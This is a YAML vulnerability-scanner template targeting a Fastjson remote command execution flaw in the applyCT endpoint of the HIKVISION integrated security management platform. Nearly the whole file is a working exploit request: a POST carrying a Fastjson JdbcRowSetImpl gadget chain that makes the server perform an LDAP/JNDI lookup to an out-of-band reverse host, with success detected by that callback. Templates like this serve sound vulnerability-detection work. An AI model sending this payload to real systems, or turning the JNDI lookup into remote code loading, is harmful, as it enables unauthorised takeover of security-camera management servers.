id: hikvision-applyct-fastjson-rce

info:
  name: HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞
  author: zan8in
  severity: critical
  description: |
    HIKVISION 综合安防管理平台 applyCT 存在低版本Fastjson远程命令执行漏洞，攻击者通过漏洞可以执行任意命令获取服务器权限
    app="HIKVISION-综合安防管理平台"
  reference:
    - http://wiki.peiqi.tech/wiki/iot/HIKVISION/HIKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20applyCT%20Fastjson%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html

set:
  reverse: newReverse()
  reverseURL: reverse.url.host
rules:
  r0:
    request:
      method: POST
      path: /bic/ssoService/v1/applyCT
      headers:
        Content-Type: application/json
      body: |
        {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{reverseURL}}","autoCommit":true},"hfe4zyyzldp":"="} 
    expression: reverse.wait(5)
expression: r0()
